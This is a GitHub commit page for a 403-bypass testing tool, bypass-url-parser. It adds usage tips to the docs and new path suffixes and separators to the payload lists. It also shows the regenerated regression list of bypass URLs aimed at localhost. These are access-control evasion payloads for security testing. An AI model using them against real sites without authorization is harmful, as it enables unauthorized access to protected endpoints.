Skip to content

Commit

Permalink
adding Sica tips
Browse files Browse the repository at this point in the history
  • Loading branch information
@louka-jc
louka-jc committed May 5, 2024
1 parent 863c051 commit 5baabf9
Show file tree
Hide file tree
Showing 5 changed files with 41 additions and 1 deletion.
2 changes: 2 additions & 0 deletions CONTRIBUTING.md
View file
Original file line number Diff line number Diff line change
Expand Up @@ -12,6 +12,8 @@ export PATH="$HOME/.local/share/mise/shims:$PATH"
pdm run tox run-parallel
# Ensure no regression is pushed
bypass-url-parser -S 0 -v -u http://127.0.0.1:8000/foo/bar --dump-payloads > "tests-history/bup-payloads-$(date +'%Y-%m-%d').lst"
# If bup installed globally, use
python src/bypass_url_parser/__init__.py -S 0 -v -u http://127.0.0.1:8000/foo/bar --dump-payloads > "tests-history/bup-payloads-$(date +'%Y-%m-%d').lst"
# Compare /tmp/bup-payloads-YYYY-MM-DD.lst and the latest tests-history/bup-payloads-YYYY-MM-DD.lst
git diff --no-index $(find tests-history -type f | sort -n | tail -n 2)
# Push your changes
Expand Down
3 changes: 3 additions & 0 deletions README.md
View file
Original file line number Diff line number Diff line change
Expand Up @@ -114,6 +114,9 @@ sudo apt install -y bat curl virtualenv python3
virtualenv -p python3 .py3
source .py3/bin/activate
PDM_BUILD_SCM_VERSION="$(git describe --abbrev=0)-dev" pip install .
# If bup installed globally, use
python src/bypass_url_parser/__init__.py -u https://thinkloveshare.com/juicy_403_endpoint/
# Else this should work
bypass-url-parser -u https://thinkloveshare.com/juicy_403_endpoint/
cat /tmp/tmpRANDOM-bypass-url-parser/triaged-bypass.json | jq -r '.results[].request_curl_cmd'
cat /tmp/tmpRANDOM-bypass-url-parser/triaged-bypass.json | jq -r '.results[].response_data'
Expand Down
6 changes: 6 additions & 0 deletions src/bypass_url_parser/payloads/internal_endpaths.lst
View file
Original file line number Diff line number Diff line change
Expand Up @@ -41,3 +41,9 @@ false
null
true
~
.js
.css
.gif
.jpe?g
.png
.xls
1 change: 1 addition & 0 deletions src/bypass_url_parser/payloads/internal_midpaths.lst
View file
Original file line number Diff line number Diff line change
@@ -1,3 +1,4 @@
,
;
;?
;/
Expand Down
30 changes: 29 additions & 1 deletion tests-history/bup-payloads-2024-05-05.lst
View file
Original file line number Diff line number Diff line change
@@ -1,5 +1,5 @@

Bypasser has generated 3750 payloads for 'http://127.0.0.1:8000/foo/bar' url:
Bypasser has generated 3778 payloads for 'http://127.0.0.1:8000/foo/bar' url:
[case_substitution] http://127.0.0.1:8000/Foo/bar
[case_substitution] http://127.0.0.1:8000/fOo/bar
[case_substitution] http://127.0.0.1:8000/foO/bar
Expand Down Expand Up @@ -48,10 +48,20 @@ Bypasser has generated 3750 payloads for 'http://127.0.0.1:8000/foo/bar' url:
[end_paths] http://127.0.0.1:8000/foo/bar..\;/
[end_paths] http://127.0.0.1:8000/foo/bar./
[end_paths] http://127.0.0.1:8000/foo/bar.//
[end_paths] http://127.0.0.1:8000/foo/bar.css
[end_paths] http://127.0.0.1:8000/foo/bar.css/
[end_paths] http://127.0.0.1:8000/foo/bar.gif
[end_paths] http://127.0.0.1:8000/foo/bar.gif/
[end_paths] http://127.0.0.1:8000/foo/bar.html
[end_paths] http://127.0.0.1:8000/foo/bar.html/
[end_paths] http://127.0.0.1:8000/foo/bar.jpe?g
[end_paths] http://127.0.0.1:8000/foo/bar.jpe?g/
[end_paths] http://127.0.0.1:8000/foo/bar.js
[end_paths] http://127.0.0.1:8000/foo/bar.js/
[end_paths] http://127.0.0.1:8000/foo/bar.json
[end_paths] http://127.0.0.1:8000/foo/bar.json/
[end_paths] http://127.0.0.1:8000/foo/bar.png
[end_paths] http://127.0.0.1:8000/foo/bar.png/
[end_paths] http://127.0.0.1:8000/foo/bar.random
[end_paths] http://127.0.0.1:8000/foo/bar.random/
[end_paths] http://127.0.0.1:8000/foo/bar.svc
Expand All @@ -60,6 +70,8 @@ Bypasser has generated 3750 payloads for 'http://127.0.0.1:8000/foo/bar' url:
[end_paths] http://127.0.0.1:8000/foo/bar.svc?wsdl/
[end_paths] http://127.0.0.1:8000/foo/bar.wsdl
[end_paths] http://127.0.0.1:8000/foo/bar.wsdl/
[end_paths] http://127.0.0.1:8000/foo/bar.xls
[end_paths] http://127.0.0.1:8000/foo/bar.xls/
[end_paths] http://127.0.0.1:8000/foo/bar/
[end_paths] http://127.0.0.1:8000/foo/bar/#
[end_paths] http://127.0.0.1:8000/foo/bar/#/
Expand Down Expand Up @@ -97,10 +109,20 @@ Bypasser has generated 3750 payloads for 'http://127.0.0.1:8000/foo/bar' url:
[end_paths] http://127.0.0.1:8000/foo/bar/..\;/
[end_paths] http://127.0.0.1:8000/foo/bar/./
[end_paths] http://127.0.0.1:8000/foo/bar/.//
[end_paths] http://127.0.0.1:8000/foo/bar/.css
[end_paths] http://127.0.0.1:8000/foo/bar/.css/
[end_paths] http://127.0.0.1:8000/foo/bar/.gif
[end_paths] http://127.0.0.1:8000/foo/bar/.gif/
[end_paths] http://127.0.0.1:8000/foo/bar/.html
[end_paths] http://127.0.0.1:8000/foo/bar/.html/
[end_paths] http://127.0.0.1:8000/foo/bar/.jpe?g
[end_paths] http://127.0.0.1:8000/foo/bar/.jpe?g/
[end_paths] http://127.0.0.1:8000/foo/bar/.js
[end_paths] http://127.0.0.1:8000/foo/bar/.js/
[end_paths] http://127.0.0.1:8000/foo/bar/.json
[end_paths] http://127.0.0.1:8000/foo/bar/.json/
[end_paths] http://127.0.0.1:8000/foo/bar/.png
[end_paths] http://127.0.0.1:8000/foo/bar/.png/
[end_paths] http://127.0.0.1:8000/foo/bar/.random
[end_paths] http://127.0.0.1:8000/foo/bar/.random/
[end_paths] http://127.0.0.1:8000/foo/bar/.svc
Expand All @@ -109,6 +131,8 @@ Bypasser has generated 3750 payloads for 'http://127.0.0.1:8000/foo/bar' url:
[end_paths] http://127.0.0.1:8000/foo/bar/.svc?wsdl/
[end_paths] http://127.0.0.1:8000/foo/bar/.wsdl
[end_paths] http://127.0.0.1:8000/foo/bar/.wsdl/
[end_paths] http://127.0.0.1:8000/foo/bar/.xls
[end_paths] http://127.0.0.1:8000/foo/bar/.xls/
[end_paths] http://127.0.0.1:8000/foo/bar//
[end_paths] http://127.0.0.1:8000/foo/bar///
[end_paths] http://127.0.0.1:8000/foo/bar////
Expand Down Expand Up @@ -2386,6 +2410,7 @@ Bypasser has generated 3750 payloads for 'http://127.0.0.1:8000/foo/bar' url:
[mid_paths] http://127.0.0.1:8000/%u002e;foo/bar
[mid_paths] http://127.0.0.1:8000/%u002efoo/bar
[mid_paths] http://127.0.0.1:8000/&foo/bar
[mid_paths] http://127.0.0.1:8000/,foo/bar
[mid_paths] http://127.0.0.1:8000/.%00/foo/bar
[mid_paths] http://127.0.0.1:8000/.%00foo/bar
[mid_paths] http://127.0.0.1:8000/.%2e/foo/bar
Expand Down Expand Up @@ -2552,6 +2577,7 @@ Bypasser has generated 3750 payloads for 'http://127.0.0.1:8000/foo/bar' url:
[mid_paths] http://127.0.0.1:8000//&foo/bar
[mid_paths] http://127.0.0.1:8000//*/foo/bar
[mid_paths] http://127.0.0.1:8000//*foo/bar
[mid_paths] http://127.0.0.1:8000//,foo/bar
[mid_paths] http://127.0.0.1:8000//.%00/foo/bar
[mid_paths] http://127.0.0.1:8000//.%00foo/bar
[mid_paths] http://127.0.0.1:8000//.%2e/foo/bar
Expand Down Expand Up @@ -2961,6 +2987,7 @@ Bypasser has generated 3750 payloads for 'http://127.0.0.1:8000/foo/bar' url:
[mid_paths] http://127.0.0.1:8000//foo/%u002e;bar
[mid_paths] http://127.0.0.1:8000//foo/%u002ebar
[mid_paths] http://127.0.0.1:8000//foo/&bar
[mid_paths] http://127.0.0.1:8000//foo/,bar
[mid_paths] http://127.0.0.1:8000//foo/.%00/bar
[mid_paths] http://127.0.0.1:8000//foo/.%00bar
[mid_paths] http://127.0.0.1:8000//foo/.%2e/bar
Expand Down Expand Up @@ -3461,6 +3488,7 @@ Bypasser has generated 3750 payloads for 'http://127.0.0.1:8000/foo/bar' url:
[mid_paths] http://127.0.0.1:8000/foo/%u002e;bar
[mid_paths] http://127.0.0.1:8000/foo/%u002ebar
[mid_paths] http://127.0.0.1:8000/foo/&bar
[mid_paths] http://127.0.0.1:8000/foo/,bar
[mid_paths] http://127.0.0.1:8000/foo/.%00/bar
[mid_paths] http://127.0.0.1:8000/foo/.%00bar
[mid_paths] http://127.0.0.1:8000/foo/.%2e/bar
Expand Down

0 comments on commit 5baabf9

Please sign in to comment.